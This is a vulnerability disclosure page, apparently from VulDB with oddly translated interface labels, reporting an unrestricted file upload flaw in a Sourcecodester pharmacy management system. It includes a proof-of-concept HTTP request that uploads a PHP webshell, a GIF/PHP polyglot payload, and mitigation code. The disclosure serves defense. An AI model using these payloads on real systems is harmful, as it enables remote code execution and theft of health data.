Súbít #553722: Sourcecodester Web-based Pharmacy Product Management System v1.0 Unrestricted Uploadbayani

KuraSourcecodester Web-based Pharmacy Product Management System v1.0 Unrestricted Upload
Gaskiya## **Critical Security Advisory: Unrestricted File Upload Vulnerability in Pharmacy Management System** ### **Vulnerability Summary** - **Title:** Unrestricted File Upload Leading to Remote Code Execution (RCE) - **Affected Version:** Web-based Pharmacy Product Management System (≤ v1.0) - **Risk Level:** **Critical (CVSS: 9.8)** - **Discovered By:** yaklang.io, IRify, Yakit --- ### **Vulnerability Details** #### **Root Cause** The `edit-photo.php` file fails to properly validate file uploads, relying only on **client-controllable MIME type checks** (`$_FILES['avatar']['type']`). Attackers can bypass this check and upload malicious files (e.g., `.php`, `.html`, `.js`) to the `uploadImage/` directory, leading to **Remote Code Execution (RCE)** or **Cross-Site Scripting (XSS)**. #### **Key Issues** 1. **No File Extension Validation** - Only checks MIME type (`image/jpeg`, `image/png`, etc.), which can be spoofed. - No validation of file content (e.g., `getimagesize()` should be mandatory). 2. **Predictable File Storage** - Uploaded files retain original names (`move_uploaded_file($_FILES["avatar"]["name"]`) - No randomization or secure storage mechanism. 3. **Lack of Server-Side Protections** - No `.htaccess`/`web.config` restrictions to prevent script execution in `uploadImage/`. - No file size limits, allowing **Denial-of-Service (DoS)** via large uploads. --- ### **Impact** - **Remote Code Execution (RCE)** - Upload a PHP webshell (`<?php system($_GET['cmd']); ?>`) → Full server takeover. - **Cross-Site Scripting (XSS)** - Upload malicious `.html`/`.js` files → Session hijacking, phishing. - **Data Breach & Compliance Violations** - Exposes **PHI (Protected Health Information)** → **HIPAA violations**. --- ### **Proof of Concept (PoC)** #### **1. Bypassing MIME Check** ```http POST /edit-photo.php HTTP/1.1 Host: target.com Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxyz ------WebKitFormBoundaryxyz Content-Disposition: form-data; name="avatar"; filename="shell.php" Content-Type: image/jpeg # Spoofed MIME type <?php system($_GET['cmd']); ?> ------WebKitFormBoundaryxyz-- ``` - **Result:** `shell.php` is uploaded to `uploadImage/` and executable via: `http://target.com/uploadImage/shell.php?cmd=id` #### **2. GIF + PHP Polyglot Attack** ```php GIF89a; <?php system($_GET['cmd']); ?> ``` - Bypasses `getimagesize()` checks while still executing PHP. --- ### **Mitigation & Fixes** #### **1. Strict File Validation** ```php $allowed_ext = ['jpg', 'jpeg', 'png', 'gif', 'webp']; $file_ext = strtolower(pathinfo($_FILES['avatar']['name'], PATHINFO_EXTENSION)); if (!in_array($file_ext, $allowed_ext) || !@getimagesize($_FILES['avatar']['tmp_name'])) { die("Invalid file type or corrupted image."); } ``` #### **2. Secure File Storage** - **Randomize filenames:** ```php $new_name = bin2hex(random_bytes(16)) . '.' . $file_ext; move_uploaded_file($_FILES["avatar"]["tmp_name"], "uploadImage/" . $new_name); ``` - **Prevent script execution:** - Add `.htaccess` in `uploadImage/`: ```apache php_flag engine off RemoveHandler .php .phtml .phar ``` #### **3. Server Hardening** - **Set file size limits** (`upload_max_filesize` in `php.ini`). - **Disable dangerous PHP functions** (`system`, `exec`, `shell_exec`). - **Log all upload attempts** for auditing. --- ### **Compliance Implications** - **HIPAA Violation:** Unauthorized PHI access via RCE. - **PCI DSS Non-Compliance:** Lack of file upload controls (Req. 6.5.1). - **GDPR Breach:** Potential PII exposure. --- ### **Recommendations** 1. **Immediate Action:** - Disable file uploads until patched. - Scan `uploadImage/` for malicious files. 2. **Long-Term Fixes:** - Migrate to a secure file storage service (AWS S3, Azure Blob). - Conduct a **full security audit** of the application. --- **References:** - OWASP Unrestricted File Upload (A05:2021) - CWE-434: Unrestricted Upload of Dangerous File Types - NIST SP 800-123: Secure File Upload Guidelines
Manga⚠️ https://github.com/yaklang/IRifyScanResult/blob/main/Web-based%20Pharmacy%20Product%20Management%20System/upload_in_edit-photo.md
Màdùmga
 lingze (UID 83608)
Furta04/08/2025 17:51 (10 Wurɗi 전)
Gargajiya04/17/2025 14:50 (9 days later)
HalittaShingilam
VulDB gite305399 [SourceCodester Web-based Pharmacy Product Management System 1.0 /edit-photo.php Avatar kura hakki ndiyam]
Nganji20

GurɗoGumtiGada

Want to stay up to date on a daily basis?

Enable the mail alert feature now!